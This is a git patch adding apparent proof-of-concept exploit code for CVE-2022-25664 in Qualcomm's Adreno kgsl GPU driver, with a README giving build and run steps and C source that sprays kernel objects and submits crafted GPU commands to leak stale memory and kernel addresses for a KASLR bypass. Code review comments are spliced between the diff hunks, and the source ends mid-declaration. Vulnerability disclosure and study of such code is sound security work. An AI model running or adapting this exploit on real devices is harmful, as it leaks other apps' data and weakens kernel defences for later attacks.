From 3cd53e14a97bcd7854fb64f6bd03c1ce93bf216a Mon Sep 17 00:00:00 2001 From: Man Yue Mo Date: Tue, 21 Feb 2023 11:29:33 +0000 Subject: [PATCH] Initial commit. --- .../Android/Qualcomm/CVE_2022_25664/README.md | 48 ++++ .../CVE_2022_25664/adreno_kernel/adreno_cmd.c | 76 ++++++ .../CVE_2022_25664/adreno_kernel/adreno_cmd.h | 40 +++ .../adreno_kernel/adreno_kernel.c | 225 +++++++++++++++++ .../CVE_2022_25664/adreno_kernel/dma_search.h | 94 +++++++ .../CVE_2022_25664/adreno_kernel/kgsl_utils.c | 80 ++++++ .../CVE_2022_25664/adreno_kernel/kgsl_utils.h | 237 ++++++++++++++++++ .../CVE_2022_25664/adreno_user/adreno.h | 218 ++++++++++++++++ .../CVE_2022_25664/adreno_user/adreno_user.c | 221 ++++++++++++++++ 9 files changed, 1239 insertions(+) create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md new file mode 100644 index 0000000..cfb7192 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md 
@@ -0,0 +1,48 @@ +## CVE-2022-25664 + +The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app. + +The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command: + +``` +aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user +``` + +and then push `adreno_user` to the device and run it. It should print out non zero memory content: + +``` +flame:/ $ /data/local/tmp/adreno_user +hexdump(0x50000000, 0x190) +00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......| +00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...| +00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................| +00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| +00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........| +00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...| +....... +``` + +The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and tries to leak kernel addresses. 
Depending on whether the device is running kernel branch 4.x or 5.x, the Macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to either `4` or `5`. + +To test, compile with + +``` +aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel +``` + +and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions: + +``` +flame:/ $ /data/local/tmp/adreno_kernel +found dma fence object: +kgsl_syncsource_fence_ops address: ffffff9daaea8b48 +object address: fffffffe116100a0 +syncsource address: fffffffe0b244480 +``` + +It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick Pixel 4, but takes longer on the Samsung Z flip 3. diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c new file mode 100644 index 0000000..9a9b279 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c 
@@ -0,0 +1,76 @@ +#include "adreno_cmd.h" + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +uint cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, size); +} + +uint cp_invalidate_state( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3); + *cmds++ = 0x40000; + *cmds++ = 0; + *cmds++ = 0; + + return cmds - start; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h new file mode 100644 index 0000000..01cfeb5 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h 
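Review bot: `cp_mem_packet` takes `int opcode` while every other helper in this file, including the `cp_type7_packet` it forwards to, takes `uint`, so the argument is silently converted at the call; the signature should read `uint cp_mem_packet(uint opcode, uint size, uint num_mem)`, with the matching prototype in adreno_cmd.h updated the same way. `pm4_calc_odd_parity_bit` also deserves a comment, since the magic constant is opaque: `/* XOR-fold the eight nibbles of val, then index 0x9669 with the 4-bit result: yields 1 when that nibble has an even number of set bits, i.e. the bit that makes the overall parity odd */`. The same helpers are duplicated as `static inline` functions in adreno_user/adreno.h, so any fix here needs to be mirrored there.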
@@ -0,0 +1,40 @@ +#ifndef ADRENO_CMD_H +#define ADRENO_CMD_H + +#include + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr); + +uint pm4_calc_odd_parity_bit(uint val); + +uint cp_type7_packet(uint opcode, uint cnt); + +uint cp_wait_for_me(uint *cmds); + +uint cp_mem_packet(int opcode, uint size, uint num_mem); + +uint cp_wait_for_idle(uint *cmds); + +uint cp_type4_packet(uint opcode, uint cnt); + +uint cp_register(unsigned int reg, unsigned int size); + +uint cp_invalidate_state(uint *cmds); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c new file mode 100644 index 0000000..474f706 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c 
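Review bot: The `upper_32_bits` macro shifts by 16 twice rather than by 32 with no explanation, and a reader is likely to "simplify" it; a comment should record why: `/* two 16-bit shifts so the macro is also well-defined for 32-bit n, where a single >> 32 would be UB */`. The prototypes use `uint`, which is not a standard C type but a BSD/glibc typedef, so the header depends on the including file having pulled in `<sys/types.h>` (the `#include` line in this hunk is rendered without its target, so I cannot tell what it includes). A one-line header comment naming the packet format these helpers build (type-4 and type-7 CP packets with a parity bit in the header word) would make the file self-describing.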
@@ -0,0 +1,225 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#include "kgsl_utils.h" +#include "adreno_cmd.h" +#include "dma_search.h" + +#define CMD_SIZE 4 + +#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE) + +#define CPU_PARTIAL 30 + +#define MMAP_SPRAY 1000 + +#define OBJ_SPRAY 10000 + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +#define KERNEL_BRANCH KERNEL_4 + +void migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + err(1, "Error in the syscall setaffinity"); + } +} + +static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) { + uint32_t* out = NULL; + out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (out == MAP_FAILED) { + err(1, "shared_mem_buf failed"); + } + int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0); + + if (ret == -1) { + err(1, "kgsl_map failed %p\n", out); + } + return out; +} + +static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) { + uint32_t* write_cmds; + + write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5; + + write_cmds = write_cmd_buf; + + *write_cmds++ = cp_type7_packet(CP_NOP, 1); + *write_cmds++ = 0xffffffff; + + *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n); + + write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr); + + return (write_cmds - write_cmd_buf + n) * CMD_SIZE; +} + + +static int io_setup(unsigned nr, 
aio_context_t *ctxp) +{ + return syscall(__NR_io_setup, nr, ctxp); +} + +static int io_destroy(aio_context_t ctx) +{ + return syscall(__NR_io_destroy, ctx); +} + +int find_address() { + uint32_t *write_cmd_buf; + uint64_t *shared_mem_buf; + void *shared_mem_buf2; + uint64_t shared_mem_gpuaddr2; + uint32_t n = 2048; + uint64_t shared_mem_size = 0x2000; + uint32_t cmd_size; + uint64_t write_cmd_gpuaddr = 0; + uint64_t shared_mem_gpuaddr = 0; + uint64_t hole_size = 0x1000; + int fds[OBJS_PER_SLAB * CPU_PARTIAL]; + int spray_fds[OBJ_SPRAY]; + + int fd = open("/dev/kgsl-3d0", O_RDWR); + + if (fd == -1) { + err(1, "cannot open kgsl"); + } + + uint32_t ctx_id; + if (kgsl_ctx_create(fd, &ctx_id)) { + err(1, "kgsl_ctx_create failed."); + } + + struct kgsl_syncsource_create syncsource = {0}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) { + err(1, "unable to create syncsource\n"); + } + + for (int i = 0; i < OBJ_SPRAY; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + spray_fds[i] = create_fence.fence_fd; + } + + for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + fds[i] = create_fence.fence_fd; + } + + shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size); + write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000); + uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr; + + write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE; + + uint32_t* write_cmd_buf_start = write_cmd_buf; + cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n); + + usleep(50000); + void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + shared_mem_buf2 = mmap(NULL, 0x1000, 
PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + if (shared_mem_buf2 == MAP_FAILED) { + err(1, "shared_mem_buf2 failed"); + } + + munmap(hole, hole_size); + aio_context_t ctx = 0; + uint32_t nr_events = 32; + + migrate_to_cpu(0); + for (int i = 0; i < OBJS_PER_SLAB; i++) { + close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]); + } + + for (int i = 0; i < (CPU_PARTIAL - 1); i++) { + close(fds[i * OBJS_PER_SLAB]); + } + + if (io_setup(nr_events, &ctx) < 0) err(1, "io_setup error\n"); + if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) { + err(1, "kgsl_map failed (shared_mem_buf2)"); + } + + if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) { + err(1, "gpu_command failed."); + } + usleep(150000); + if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) { + err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr); + } + if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) { + err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx); + } + + int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH); + if (ret == -1) { + io_destroy(ctx); + munmap(shared_mem_buf2, 0x1000); + munmap(shared_mem_buf, 0x2000); + munmap(write_cmd_buf, 0x1000); + for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]); + for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]); + close(fd); + } + return ret; +} + +int main() { + + for (int i = 0; i < MMAP_SPRAY; i++) { + mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + } + int success = -1; + int counter = 0; + while (success == -1) { + success = find_address(); + counter++; + if (counter % 20 == 0) printf("failed after %d\n", counter); + } + +} 
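Review bot: `KERNEL_BRANCH` is an `enum dma_search_type` value (`KERNEL_4` or `KERNEL_5`, i.e. 0 or 1), but the README hunk in this same commit tells the user to set it to `4` or `5`; a literal 4 or 5 compiles in C and then reaches the `unknown kernel branch` `err()` in `dma_search`, so the README and the define disagree. A comment on the define avoids the trap: `/* KERNEL_4 or KERNEL_5 from dma_search.h, not a bare number */`. In `find_address`, the `hole` mapping is never checked before `munmap(hole, hole_size)` — `munmap` on `MAP_FAILED` is a silent failure — so it needs the same `MAP_FAILED` check that `shared_mem_buf2` gets; `int find_address()` should also be `int find_address(void)` so the prototype actually has a parameter list. The `err()` calls that print `uint64_t` values with `%lx` should use `PRIx64` from `<inttypes.h>` to keep `-Wformat` clean.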
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h new file mode 100644 index 0000000..b103107 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h 
@@ -0,0 +1,94 @@ +#ifndef DMA_SEARCH_H +#define DMA_SEARCH_H + +#include +#include + +#define OBJECT_SIZE 128 + +#define STRIDE (OBJECT_SIZE/8) + +struct dma_info { + uint64_t ops; + uint64_t cb_list; + uint64_t spinlock; + uint64_t context; +}; + +enum dma_search_type { + KERNEL_4, + KERNEL_5 +}; + +int try_match_object_54(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //cb_list not initialized + if (obj[2] != obj[3]) return 0; + //no cb_list + if (obj[2] == 0 || obj[3] == 0) return 0; + if (out->ops == 0) { + out->ops = obj[1]; + out->cb_list = obj[2]; + out->context = obj[4]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + return 1; +} + +int try_match_object_414(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //rcu not zero + if (obj[2] != 0 || obj[3] != 0) return 0; + //cb_list not initialized + if (obj[4] != obj[5]) return 0; + //no cb_list + if (obj[4] == 0 || obj[5] == 0) return 0; + //no spinlock + if (obj[6] == 0) return 0; + if (out->ops == 0) { + out->ops = obj[1]; + out->cb_list = obj[4]; + out->spinlock = obj[6]; + out->context = obj[7]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + if (out->spinlock != obj[6]) { + printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]); + return 0; + } + return 1; +}; + +int dma_search(uint64_t* region, size_t len, enum dma_search_type type) { + if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n"); + struct dma_info info = {0}; + int match = 0; + for (int i = 0; i < len; i+= STRIDE) { + if (type == KERNEL_4) { + match += try_match_object_414(region + i, &info); + } else if (type == KERNEL_5){ + match += try_match_object_54(region + i, &info); + } else { + err(1, "unknown kernel branch\n"); + } + } + if (match > 3) { + printf("found dma fence object:\n"); + 
printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops); + printf("object address: %lx\n", info.cb_list); + return 1; + } + return -1; +}; + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c new file mode 100644 index 0000000..1fc3c5a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c 
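Review bot: The guard at the top of `dma_search` mixes units: `len` is a count of `uint64_t` elements (the caller passes `0x1000/8`) and the loop advances by `STRIDE` elements, yet the check is `len % OBJECT_SIZE`, a byte size; it should be `if (len % STRIDE != 0) errx(1, "len is not divisible by object stride\n");`, and `errx` rather than `err` because no errno is set here, so `err` appends an unrelated strerror text. The loop index should be `size_t i` to match `len` and avoid the signed/unsigned comparison. The functions are defined non-`static` in a header, so including dma_search.h from a second translation unit would produce duplicate-symbol link errors — mark them `static`, and drop the stray `;` after the closing braces of `try_match_object_414` and `dma_search`. The `%lx` conversions for `uint64_t` fields should be `PRIx64`.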
@@ -0,0 +1,80 @@ +#include + +#include "kgsl_utils.h" + +int kgsl_ctx_create(int fd, uint32_t *ctx_id) +{ + struct kgsl_drawctxt_create req = { + .flags = 0x00001812, + }; + int ret; + + ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req); + if (ret) + return ret; + + *ctx_id = req.drawctxt_id; + + return 0; +} + +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) { + struct kgsl_command_object *cmds; + + struct kgsl_gpu_command req = { + .context_id = ctx_id, + .cmdsize = sizeof(struct kgsl_command_object), + .numcmds = n, + }; + size_t cmds_size; + uint32_t i; + + cmds_size = n * sizeof(struct kgsl_command_object); + + cmds = (struct kgsl_command_object *) malloc(cmds_size); + + if (cmds == NULL) { + return -1; + } + + memset(cmds, 0, cmds_size); + + for (i = 0; i < n; i++) { + cmds[i].flags = KGSL_CMDLIST_IB; + + if (i == target_idx) { + cmds[i].gpuaddr = target_cmd; + cmds[i].size = target_size; + } + else { + /* the shift here is helpful for debugging failed alignment */ + cmds[i].gpuaddr = gpuaddr + (i << 16); + cmds[i].size = cmdsize; + } + } + req.cmdlist = (unsigned long) cmds; + return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); +} + +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) { + struct kgsl_map_user_mem req = { + .len = len, + .offset = 0, + .hostptr = addr, + .memtype = KGSL_USER_MEM_TYPE_ADDR, +// .flags = KGSL_MEMFLAGS_USE_CPU_MAP, + }; + if (readonly) { + req.flags |= KGSL_MEMFLAGS_GPUREADONLY; + } + int ret; + + ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req); + if (ret) + return ret; + + *gpuaddr = req.gpuaddr; + + return 0; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h new file mode 100644 index 0000000..79033dc --- /dev/null 
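Review bot: `kgsl_gpu_command_payload` allocates `cmds` with `malloc` and never frees it, and the caller in adreno_kernel.c invokes it once per `find_address` retry, so the leak grows for the lifetime of the retry loop; the tail should be `int ret = ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);` `free(cmds);` `return ret;`. The `malloc` plus `memset` pair can become `cmds = calloc(n, sizeof *cmds);`, which also zero-fills and guards the size multiplication. A short header comment on each of the three functions (what the ioctl does, that `*ctx_id` / `*gpuaddr` are only written on success, and that `readonly` maps `KGSL_MEMFLAGS_GPUREADONLY`) would let a reader use them without opening the driver's UAPI.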
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h 
@@ -0,0 +1,237 @@ +#ifndef KGSL_UTILS_H +#define KGSL_UTILS_H + +#include +#include +#include + +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +#define KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + /* + * ION type is retained for backwards compatibility but Ion buffers are + * dma-bufs so try to use that naming if we can + */ + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_timeline_fence_get { + __u64 seqno; + __u32 timeline; + int handle; +}; + +#define IOCTL_KGSL_TIMELINE_FENCE_GET \ + _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get) + + +struct kgsl_timeline_create { + __u64 seqno; + __u32 id; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create) + +#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + 
unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy { + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +struct kgsl_gpuobj_import { + uint64_t __user priv; + uint64_t priv_len; + uint64_t flags; + unsigned int type; + unsigned int id; +}; + +struct kgsl_gpuobj_import_dma_buf { + int fd; +}; + +struct kgsl_gpuobj_import_useraddr { + uint64_t virtaddr; +}; + +struct kgsl_gpuobj_free { + uint64_t flags; + uint64_t __user priv; + unsigned int id; + unsigned int type; + unsigned int len; +}; + +#define KGSL_GPUOBJ_FREE_ON_EVENT 1 + +#define KGSL_GPU_EVENT_TIMESTAMP 1 +#define KGSL_GPU_EVENT_FENCE 2 + +struct kgsl_gpu_event_timestamp { + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_gpu_event_fence { + int fd; +}; + +struct kgsl_gpumem_free_id { + unsigned int id; +/* private: reserved for future use*/ + unsigned int __pad; +}; + +#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id) + +#define IOCTL_KGSL_GPUOBJ_FREE \ + 
_IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free) + +struct dma_buf_sync { + __u64 flags; +}; + +#define DMA_BUF_SYNC_READ (1 << 0) +#define DMA_BUF_SYNC_WRITE (2 << 0) +#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE) +#define DMA_BUF_SYNC_START (0 << 2) +#define DMA_BUF_SYNC_END (1 << 2) +#define DMA_BUF_SYNC_USER_MAPPED (1 << 3) + +#define DMA_BUF_SYNC_VALID_FLAGS_MASK \ + (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END) + +#define DMA_BUF_BASE 'b' +#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync) + +#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL + + +struct kgsl_syncsource_create { + unsigned int id; +/* private: reserved for future use */ + unsigned int __pad[3]; +}; + +#define IOCTL_KGSL_SYNCSOURCE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create) + +struct kgsl_syncsource_create_fence { + unsigned int id; + int fence_fd; +/* private: reserved for future use */ + unsigned int __pad[4]; +}; + +/** + * struct kgsl_syncsource_signal_fence - Argument to + * IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE + * @id: syncsource id + * @fence_fd: sync_fence fd to signal + * + * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE + * call using the same syncsource id. This allows a fence to be shared + * to other processes but only signaled by the process owning the fd + * used to create the fence. + */ +#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \ + _IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence) + +int 